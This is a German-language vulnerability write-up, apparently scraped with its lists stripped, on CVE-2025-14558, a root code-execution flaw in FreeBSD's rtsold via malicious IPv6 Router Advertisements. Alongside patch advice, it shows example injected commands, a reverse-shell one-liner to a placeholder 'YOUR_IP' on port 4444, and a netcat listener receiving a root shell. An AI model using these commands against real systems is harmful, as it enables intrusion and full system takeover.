
CVE-2025-14558
CVE-2025-14558 ist eine kritische Schwachstelle zur Remotecodeausführung (RCE), die FreeBSD-Systeme betrifft, die IPv6-Router-Solicitation-Dienste verwenden. Ein Fehler in der Handhabung von nicht vertrauenswürdigen Netzwerkeingaben ermöglicht es Angreifern, beliebige Shell-Befehle auszuführen.
rtsol(8)rtsold(8)resolvconf(8) übergebenBei erfolgreicher Ausnutzung kann ein Angreifer:
Dringend empfohlene Maßnahmen:
rtsol / rtsold deaktivieren, wenn IPv6-RA nicht erforderlich istJedes FreeBSD-System, das IPv6 Router Advertisements in einem nicht vertrauenswürdigen Netzwerk abhört, ist einem hohen Risiko ausgesetzt. Patchen Sie sofort oder deaktivieren Sie die betroffenen Dienste.
Wenn das PoC-Skript für CVE-2025-14558 erfolgreich auf einem anfälligen FreeBSD-System funktioniert (ungepatcht, mit laufendem rtsold und Verarbeitung von IPv6-RA-Nachrichten):
rtsold als root läuft und /sbin/resolvconf mit der schädlichen Domain aufruft).Bei einfachem Test wie --command "id > /tmp/pwned":
Eine Datei /tmp/pwned wird erstellt, die eine Ausgabe wie die folgende enthält:
uid=0(root) gid=0(wheel) groups=0(wheel)
Für --command "touch /tmp/exploit_success":
/tmp/exploit_success erscheint.Für eine Reverse Shell wie --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":
Überprüfen Sie auf dem Ziel mit Befehlen wie:
ls -l /tmp/pwned
cat /tmp/pwned
Das Skript gibt Folgendes aus:
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
Für Reverse Shell: Bei Erfolg erhält Ihr nc -lvnp 4444 eine Verbindung und eine Root-Shell:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(Sie haben jetzt eine Root-Shell – geben Sie Befehle wie id, whoami usw. ein.)
rtsold läuft nicht, nicht im selben L2-Netzwerk, Firewall blockiert RA oder IPv6 deaktiviert.Dies ist nur in einer kontrollierten Laborumgebung auf einem anfälligen (vor dem Patch vom 16. Dezember 2025) FreeBSD-System beobachtbar. Es gibt keine öffentlichen Berichte über Ausnutzung in der Praxis bis zum 23. Dezember 2025. Patchen Sie sofort in der Produktion.